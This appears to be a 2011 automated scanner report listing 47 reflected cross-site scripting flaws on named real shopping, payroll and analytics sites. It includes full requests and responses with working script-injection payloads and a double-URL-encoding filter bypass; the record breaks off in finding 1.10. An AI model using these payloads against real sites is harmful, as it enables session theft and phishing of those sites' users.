XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, McAfee 09302011-03

Report generated by dork at Fri Sep 30 09:35:29 CDT 2011.
Loading

1. Cross-site scripting (reflected)

1.1. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]

1.2. http://cvt-wynn-001.convertglobal.com/convert/Wynn [callback parameter]

1.3. http://livingdirectinc.tt.omtrdc.net/m2/livingdirectinc/mbox/standard [mbox parameter]

1.4. http://my.shop.ssgecom.com/ [hierdx parameter]

1.5. http://my.shop.ssgecom.com/ [spage parameter]

1.6. http://my.shop.ssgecom.com/ [spage parameter]

1.7. http://permanentgeneralcomp.tt.omtrdc.net/m2/permanentgeneralcomp/mbox/standard [mbox parameter]

1.8. http://sp1.convertro.com/trax/hit/wineenthusiast/0/ [typ parameter]

1.9. http://sp1.convertro.com/trax/hit/wineenthusiast/1/ [typ parameter]

1.10. http://t.p.mybuys.com/webrec/wr.do [ckc parameter]

1.11. http://t.p.mybuys.com/webrec/wr.do [ckc parameter]

1.12. http://t.p.mybuys.com/webrec/wr.do [ckc parameter]

1.13. http://vms.boldchat.com/aid/4851320892863947163/bc.vms/vms.js [cp parameter]

1.14. http://vms.boldchat.com/aid/4851320892863947163/bc.vms/vms.js [name of an arbitrarily supplied request parameter]

1.15. http://vms.boldchat.com/aid/4851320892863947163/bc.vms/vms.js [referrer parameter]

1.16. http://vms.boldchat.com/aid/4851320892863947163/bc.vms/vms.js [url parameter]

1.17. http://www.bountyhunterwine.com/message.asp [msg parameter]

1.18. http://www.bountyhunterwine.com/message.asp [name of an arbitrarily supplied request parameter]

1.19. http://www.bountyhunterwine.com/viewcart.asp [name of an arbitrarily supplied request parameter]

1.20. http://www.charlottes-saddlery.com/ [name of an arbitrarily supplied request parameter]

1.21. http://www.charlottes-saddlery.com/mm5/neoimages/favicon.ico [REST URL parameter 1]

1.22. http://www.charlottes-saddlery.com/mm5/neoimages/favicon.ico [REST URL parameter 2]

1.23. http://www.charlottes-saddlery.com/mm5/neoimages/favicon.ico [REST URL parameter 3]

1.24. http://www.originalabsinthe.com/ [name of an arbitrarily supplied request parameter]

1.25. http://www.techchecks.net/search.asp [Search parameter]

1.26. http://www.techchecks.net/search.asp [search parameter]

1.27. http://www.dickssportinggoods.com/ [Referer HTTP header]

1.28. http://www.dickssportinggoods.com/home/index.jsp [Referer HTTP header]

1.29. http://www.fogdog.com/ [Referer HTTP header]

1.30. http://www.fogdog.com/ [Referer HTTP header]

1.31. http://www.fogdog.com/home/index.jsp [Referer HTTP header]

1.32. http://www.fogdog.com/home/index.jsp [Referer HTTP header]

1.33. http://www.modells.com/ [Referer HTTP header]

1.34. http://www.modells.com/home/index.jsp [Referer HTTP header]

1.35. http://www.wineenthusiast.com/ [Referer HTTP header]

1.36. http://www.wineenthusiast.com/glassware.asp [Referer HTTP header]

1.37. http://sp1.convertro.com/trax/hit/wineenthusiast/0/ [cvo_sid1 cookie]

1.38. http://sp1.convertro.com/trax/hit/wineenthusiast/1/ [cvo_sid1 cookie]

1.39. http://www.familysecure.com/Order1.aspx [areaid parameter]

1.40. http://www.familysecure.com/Order1.aspx [name of an arbitrarily supplied request parameter]

1.41. http://www.familysecure.com/Order1.aspx [pkgid parameter]

1.42. http://www.surepayroll.com/product/payroll/ [sMkeyword cookie]

1.43. http://www.surepayroll.com/product/payroll/ [sMsource cookie]

1.44. http://www.surepayroll.com/product/payroll/payroll-services.asp [sMkeyword cookie]

1.45. http://www.surepayroll.com/product/payroll/payroll-services.asp [sMsource cookie]

1.46. http://www.wineenthusiast.com/glassware.asp [NCREmail cookie]

1.47. http://www.wineenthusiast.com/glassware.asp [WineEnthusiast1 cookie]



1. Cross-site scripting (reflected)
There are 47 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.brightcove.com
Path:   /services/messagebroker/amf

Issue detail

The value of the 3rd AMF string parameter is copied into the HTML document as plain text between tags. The payload 4027d<script>alert(1)</script>3fb7f03e572 was submitted in the 3rd AMF string parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /services/messagebroker/amf?playerKey=AQ~~,AAAAu-aNQAk~,rRhLUXeSugW_qf08TfikSE_eIHb4cHog HTTP/1.1
Host: c.brightcove.com
Proxy-Connection: keep-alive
Content-Length: 537
Origin: http://c.brightcove.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
content-type: application/x-amf
Accept: */*
Referer: http://c.brightcove.com/services/viewer/federated_f9?&width=237&height=227&flashID=myExperience&bgcolor=%23FFFFFF&playerID=865543396001&playerKey=AQ~~%2CAAAAu-aNQAk~%2CrRhLUXeSugW_qf08TfikSE_eIHb4cHog&isVid=true&isUI=true&wmode=transparent&dynamicStreaming=true&%40videoPlayer=ref%3A28484&autoStart=&debuggerID=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

.......Fcom.brightcove.experience.ExperienceRuntimeFacade.getDataForExperience../1.....    ...Q507f8fd6a3c7e5a297078ec80d78928787ee48f6
cccom.brightcove.experience.ViewerExperienceRequest.experienceId.de
...[SNIP]...

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 50.23.123.106
X-BC-Connecting-IP: 50.23.123.106
Content-Type: application/x-amf
Vary: Accept-Encoding
Date: Fri, 30 Sep 2011 13:50:17 GMT
Server:
Content-Length: 4351

......../1/onResult.......
.C[com.brightcove.templating.ViewerExperienceDTO#analyticsTrackers.publisherType.publisherId.playerKey.version#programmedContent!adTranslationSWF.id.hasProgramming+programmi
...[SNIP]...
Bg|... ..eAQ~~,AAAAu-aNQAk~,rRhLUXeSugW_qf08TfikSE_eIHb4cHog.    ..videoPlayer
sicom.brightcove.player.programming.ProgrammedMediaDTO..mediaId.componentRefId.playerId    type.mediaDTO
..Bp..%....ivideoPlayer4027d<script>alert(1)</script>3fb7f03e572..........
.cOcom.brightcove.catalog.trimmed.VideoDTO.dateFiltered+FLVFullLengthStreamed/SWFVerificationRequired.endDate.FLVFullCodec.linkText.geoRestricted.previewLength.FLVPreviewSize.longDescription
...[SNIP]...

1.2. http://cvt-wynn-001.convertglobal.com/convert/Wynn [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cvt-wynn-001.convertglobal.com
Path:   /convert/Wynn

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload cd6d7<script>alert(1)</script>ebae82b665c was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /convert/Wynn;jsessionid=?m=sjJb9&id&f&l&e&p=false&t=0&o&isEngaged=false&v=2.4&callback=_callbacks_._0gt78ct94cd6d7<script>alert(1)</script>ebae82b665c HTTP/1.1
Host: cvt-wynn-001.convertglobal.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.wineexpress.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Expires: Mon, 20 Dec 1998 01:00:00 GMT
Last-Modified: Fri Sep 30 09:50:34 EDT 2011
Cache-Control: no-cache, no-store, must-revalidate, max-age 0
Pragma: no-cache
Content-Type: text/javascript;charset=utf-8
Content-Length: 166
Date: Fri, 30 Sep 2011 13:50:34 GMT

_callbacks_._0gt78ct94cd6d7<script>alert(1)</script>ebae82b665c({"sessionId":"E0BAF78FD0660596C8ED06D0BCEE3548","visitorId":"677ffa87-77f1-4451-958e-5daf87eb9103"})

1.3. http://livingdirectinc.tt.omtrdc.net/m2/livingdirectinc/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://livingdirectinc.tt.omtrdc.net
Path:   /m2/livingdirectinc/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 48fb5<script>alert(1)</script>f8fdbacb9e6 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/livingdirectinc/mbox/standard?mboxHost=www.compactappliance.com&mboxSession=1317390628254-815998&mboxPage=1317390628254-815998&screenHeight=1200&screenWidth=1920&browserWidth=1083&browserHeight=877&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=CA%20Global%20Header%20Ribbon48fb5<script>alert(1)</script>f8fdbacb9e6&mboxId=0&mboxTime=1317372628843&mboxURL=http%3A%2F%2Fwww.compactappliance.com%2F&mboxReferrer=http%3A%2F%2Fwww.mcafeesecure.com%2Fus%2Fforconsumers%2Fmcafee_certified_sites.jsp%3Fc1%3D10%26c2%3D42&mboxVersion=40 HTTP/1.1
Host: livingdirectinc.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.compactappliance.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1317390628254-815998.19; Domain=livingdirectinc.tt.omtrdc.net; Expires=Fri, 14-Oct-2011 13:51:22 GMT; Path=/m2/livingdirectinc
Content-Type: text/javascript
Content-Length: 219
Date: Fri, 30 Sep 2011 13:51:21 GMT
Server: Test & Target

mboxFactories.get('default').get('CA Global Header Ribbon48fb5<script>alert(1)</script>f8fdbacb9e6',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1317390628254-815998.19");

1.4. http://my.shop.ssgecom.com/ [hierdx parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.shop.ssgecom.com
Path:   /

Issue detail

The value of the hierdx request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 48ece'><img%20src%3da%20onerror%3dalert(1)>b4ff5514272 was submitted in the hierdx parameter. This input was echoed as 48ece'><img src=a onerror=alert(1)>b4ff5514272 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?catalog=ESPORTS&ZZREFACT=&hiercd=&sitemid=&hierdx=48ece'><img%20src%3da%20onerror%3dalert(1)>b4ff5514272&WEBSRC=&flyercode=&keycode=&certID=&cartType=&email=&order=&zip=&keyword=&spage=&programID=&UN=&IREP=&OREP=&PW=&WM= HTTP/1.1
Host: my.shop.ssgecom.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.esportsonline.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 14:28:49 GMT
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.7
ETag: "2e3fdf551b2d4ca0b38136a4ad55c6c9"
X-Runtime: 2868
Cache-Control: private, max-age=0, must-revalidate
Status: 200
Vary: Accept-Encoding
Content-Length: 79267
Content-Type: text/html; charset=utf-8

<!--
This page was created by the
SAP Integrated ITS, WebAS: PRD, workprocess: 4
All rights reserved.
Creation time: Fri Sep 30 09:24:25 2011
Charset: iso-8859-1
Template: ZE
...[SNIP]...
<a href='http://my.shop.ssgecom.com/site/esports/category_name/48ece'><img src=a onerror=alert(1)>b4ff5514272' onClick="window.open('http://www.esportsonline.com/ITS/static/disclaimer2.asp','disclaimer2','width=300,height=250')">
...[SNIP]...

1.5. http://my.shop.ssgecom.com/ [spage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.shop.ssgecom.com
Path:   /

Issue detail

The value of the spage request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ed90%2522%253balert%25281%2529%252f%252f0ab6acf9ea1 was submitted in the spage parameter. This input was echoed as 2ed90";alert(1)//0ab6acf9ea1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the spage request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /?catalog=ESPORTS&ZZREFACT=&hiercd=&sitemid=&hierdx=&WEBSRC=&flyercode=&keycode=&certID=&cartType=&email=&order=&zip=&keyword=&spage=2ed90%2522%253balert%25281%2529%252f%252f0ab6acf9ea1&programID=&UN=&IREP=&OREP=&PW=&WM= HTTP/1.1
Host: my.shop.ssgecom.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.esportsonline.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 14:29:31 GMT
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.7
ETag: "a7159655bc7d49dc6eaccc485a1dfac2"
X-Runtime: 2417
Cache-Control: private, max-age=0, must-revalidate
Status: 200
Vary: Accept-Encoding
Content-Length: 35839
Content-Type: text/html; charset=utf-8

<!--
This page was created by the
SAP Integrated ITS, WebAS: PRD, workprocess: 0
All rights reserved.
Creation time: Fri Sep 30 09:25:06 2011
Charset: iso-8859-1
Template: ZE
...[SNIP]...
de = get_catalog(input_separator,input_delimiter,input_URL);
   //alert(get_okcode);
   if (get_okcode == "SERVICE"){ // then get the requested static page
       input_delimiter="spage=";
       var reqpage = "2ed90";alert(1)//0ab6acf9ea1"
       //parent.FRAME_2.location.href="http://shop.ssgecom.com/sap/public/bc/its/mimes/zesports/99/static/"+reqpage+".asp?customerNumber=&customerName=&contactName=";
       //parent.location.href="http://my
...[SNIP]...

1.6. http://my.shop.ssgecom.com/ [spage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.shop.ssgecom.com
Path:   /

Issue detail

The value of the spage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 57f6f'><img%20src%3da%20onerror%3dalert(1)>797a3c51fab was submitted in the spage parameter. This input was echoed as 57f6f'><img src=a onerror=alert(1)>797a3c51fab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?catalog=ESPORTS&ZZREFACT=&hiercd=&sitemid=&hierdx=&WEBSRC=&flyercode=&keycode=&certID=&cartType=&email=&order=&zip=&keyword=&spage=57f6f'><img%20src%3da%20onerror%3dalert(1)>797a3c51fab&programID=&UN=&IREP=&OREP=&PW=&WM= HTTP/1.1
Host: my.shop.ssgecom.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.esportsonline.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 14:29:19 GMT
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.7
ETag: "38324c6bdbaa1d72f6db616caf443fcc"
X-Runtime: 2454
Cache-Control: private, max-age=0, must-revalidate
Status: 200
Vary: Accept-Encoding
Content-Length: 35905
Content-Type: text/html; charset=utf-8

<!--
This page was created by the
SAP Integrated ITS, WebAS: PRD, workprocess: 0
All rights reserved.
Creation time: Fri Sep 30 09:24:54 2011
Charset: iso-8859-1
Template: ZE
...[SNIP]...
<a href='http://my.shop.ssgecom.com/site/esports/static/57f6f'><img src=a onerror=alert(1)>797a3c51fab' onClick="window.open('http://www.esportsonline.com/ITS/static/disclaimer2.asp','disclaimer2','width=300,height=250')">
...[SNIP]...

1.7. http://permanentgeneralcomp.tt.omtrdc.net/m2/permanentgeneralcomp/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://permanentgeneralcomp.tt.omtrdc.net
Path:   /m2/permanentgeneralcomp/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload b8900<script>alert(1)</script>80f7aa27131 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/permanentgeneralcomp/mbox/standard?mboxHost=www.thegeneral.com&mboxSession=1317392845344-176408&mboxPage=1317392845344-176408&screenHeight=1200&screenWidth=1920&browserWidth=1083&browserHeight=877&browserTimeOffset=-300&colorDepth=16&mboxCount=1&mbox=getQuoteBodyZipGoButtonb8900<script>alert(1)</script>80f7aa27131&mboxId=0&mboxTime=1317374845436&mboxURL=http%3A%2F%2Fwww.thegeneral.com%2F&mboxReferrer=http%3A%2F%2Fwww.mcafeesecure.com%2Fus%2Fforconsumers%2Fmcafee_certified_sites.jsp%3Fc1%3D13%26c2%3D110&mboxVersion=40 HTTP/1.1
Host: permanentgeneralcomp.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.thegeneral.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 219
Date: Fri, 30 Sep 2011 14:28:03 GMT
Server: Test & Target

mboxFactories.get('default').get('getQuoteBodyZipGoButtonb8900<script>alert(1)</script>80f7aa27131',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1317392845344-176408.19");

1.8. http://sp1.convertro.com/trax/hit/wineenthusiast/0/ [typ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sp1.convertro.com
Path:   /trax/hit/wineenthusiast/0/

Issue detail

The value of the typ request parameter is copied into the HTML document as plain text between tags. The payload d1cdf<script>alert(1)</script>fa02273a5e0 was submitted in the typ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trax/hit/wineenthusiast/0/?bts=1317390625348&sid=&mid=&eid=&cid=&jid=&typ=d1cdf<script>alert(1)</script>fa02273a5e0&val=1&isa=&pag=http%3A//www.wineenthusiast.com/&ref=http%3A//www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp%3Fc1%3D10%26c2%3D42&fup=0&new=1&nji=0&sts=1303122170&dis=1920x1200x16&plu=gcswf32%2C103183%3Bnpqtplugin%2C77%3Bnpqtplugin2%2C77%3Bnpqtplugin3%2C77%3Bnpqtplugin4%2C77%3Bnpqtplugin5%2C77%3Bnpqtplugin6%2C77%3Bnpqtplugin7%2C77%3BnpdeployJava1%2C602603%3Bnpjp2%2C16026%3Bnpctrl%2C40605310%3BNPAUTHZ%2C2010%3BNPSPWRAP%2C2010%3Binternal-remoting-viewer%2C%3BppGoogleNaClPluginChrome%2C%3Bpdf%2C%3Bnpgeplugin%2C%3BnpCIDetect14%2C%3BnpGoogleUpdate3%2C%3Bnpitunes%2C%3Bnpwpidetector%2C14%3Bdefault_plugin%2C&ath=1317390625276&atb=1317390625276&log=0.001%20-%20@%200.002%0A0.069%20-%20i.e%3A%20J%20%0A0.070%20-%20%3E%3E%20te%3A%20%3B%20%3B%20%3B%201 HTTP/1.1
Host: sp1.convertro.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cvo_sid1=SPZW6FZWEK8X

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/javascript
Date: Fri, 30 Sep 2011 13:51:25 GMT
Etag: 1317390685
Last-Modified: 1317390685
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP NID PSA ADM OUR IND NAV COM"
Server: Apache/2.2.9
Set-Cookie: cvo_sid1=SPZW6FZWEK8X4e5258ce858188fb01890e32; path=/; domain=.convertro.com; expires=Fri, 01-Jan-2038 00:14:06 GMT
Vary: Accept-Encoding
X-CVO-NOTICE: internal error - check logs
X-CVO-RT-NOTICE: ptr-na
Content-Length: 413
Connection: keep-alive

$CVO.push(['setUserSid', 'SPZW6FZWEK8X4e5258ce858188fb01890e32']);

if (window.CVO) {
CVO.log("<< H[999999999] E[SPZW6FZWEK8X4e5258ce858188fb01890e32-d1cdf<script>alert(1)</script>fa02273a5e0:]");
}
else if (window.$CVO) {
$CVO.INFO("<< H[999999999] E[SPZW6FZWEK8X4e5258ce858188fb01890e32-d1cdf<script>
...[SNIP]...

1.9. http://sp1.convertro.com/trax/hit/wineenthusiast/1/ [typ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sp1.convertro.com
Path:   /trax/hit/wineenthusiast/1/

Issue detail

The value of the typ request parameter is copied into the HTML document as plain text between tags. The payload ed7ae<script>alert(1)</script>da64da55ee3 was submitted in the typ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trax/hit/wineenthusiast/1/?bts=1317390610397&sid=&mid=&eid=&cid=&jid=&typ=ed7ae<script>alert(1)</script>da64da55ee3&val=1&isa=&pag=http%3A//www.wineexpress.com/&ref=http%3A//www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp%3Fc1%3D10%26c2%3D42&fup=0&new=1&nji=0&sts=1303122170&dis=1920x1200x16&plu=gcswf32%2C103183%3Bnpqtplugin%2C77%3Bnpqtplugin2%2C77%3Bnpqtplugin3%2C77%3Bnpqtplugin4%2C77%3Bnpqtplugin5%2C77%3Bnpqtplugin6%2C77%3Bnpqtplugin7%2C77%3BnpdeployJava1%2C602603%3Bnpjp2%2C16026%3Bnpctrl%2C40605310%3BNPAUTHZ%2C2010%3BNPSPWRAP%2C2010%3Binternal-remoting-viewer%2C%3BppGoogleNaClPluginChrome%2C%3Bpdf%2C%3Bnpgeplugin%2C%3BnpCIDetect14%2C%3BnpGoogleUpdate3%2C%3Bnpitunes%2C%3Bnpwpidetector%2C14%3Bdefault_plugin%2C&ath=1317390610389&atb=1317390610389&log=0.001%20-%20@%200.001%0A0.006%20-%20i.e%3A%20J%20%0A0.007%20-%20%3E%3E%20te%3A%20%3B%20%3B%20%3B%201 HTTP/1.1
Host: sp1.convertro.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cvo_sid1=SPZW6FZWEK8X

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/javascript
Date: Fri, 30 Sep 2011 13:51:10 GMT
Etag: 1317390670
Last-Modified: 1317390670
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP NID PSA ADM OUR IND NAV COM"
Server: Apache/2.2.9
Set-Cookie: cvo_sid1=4e5258ce4e97f6b7d01a30af; path=/; domain=.convertro.com; expires=Fri, 01-Jan-2038 00:14:06 GMT
Vary: Accept-Encoding
X-CVO-RT-NOTICE: ptr-na
Content-Length: 387
Connection: keep-alive

$CVO.push(['setUserSid', '4e5258ce4e97f6b7d01a30af']);

if (window.CVO) {
CVO.log("<< H[999999999] E[4e5258ce4e97f6b7d01a30af-ed7ae<script>alert(1)</script>da64da55ee3:54517]");
}
else if (window.$CVO) {
$CVO.INFO("<< H[999999999] E[4e5258ce4e97f6b7d01a30af-ed7ae<script>
...[SNIP]...

1.10. http://t.p.mybuys.com/webrec/wr.do [ckc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://t.p.mybuys.com
Path:   /webrec/wr.do

Issue detail

The value of the ckc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4266d"%3balert(1)//5ea28e2c812 was submitted in the ckc parameter. This input was echoed as 4266d";alert(1)//5ea28e2c812 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webrec/wr.do?client=WINEEXPRESS&sessionId=18150910-25F2-5601-A408-08011B7AFE7D&ns=1&wrz=2&pt=prod&productname=Charles%20Krug%202008%20Cabernet%20Sauvignon%2C%20Napa%20Valley&cpc=28484&categoryname=&ckc=4266d"%3balert(1)//5ea28e2c812&notinstock=n&mbcc=9ED80074-FADB-567A-9FF3-03E37B6DE2C2&lang=en&v=5.0.0&mbts=1317392563417&rf=http%3A%2F%2Fwww.wineexpress.com%2F&purl=http%3A%2F%2Fwww.wineexpress.com%2Fshopping%2Fprod_detail%2Fmain.asp%3Fcat%3DWOD%26sl%3D0%26productID%3D28484%26uid%3D467272C6-13FC-4B08-9F46-83359542A5A8%26icid%3DHPWOD HTTP/1.1
Host: t.p.mybuys.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.wineexpress.com/shopping/prod_detail/main.asp?cat=WOD&sl=0&productID=28484&uid=467272C6-13FC-4B08-9F46-83359542A5A8&icid=HPWOD
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
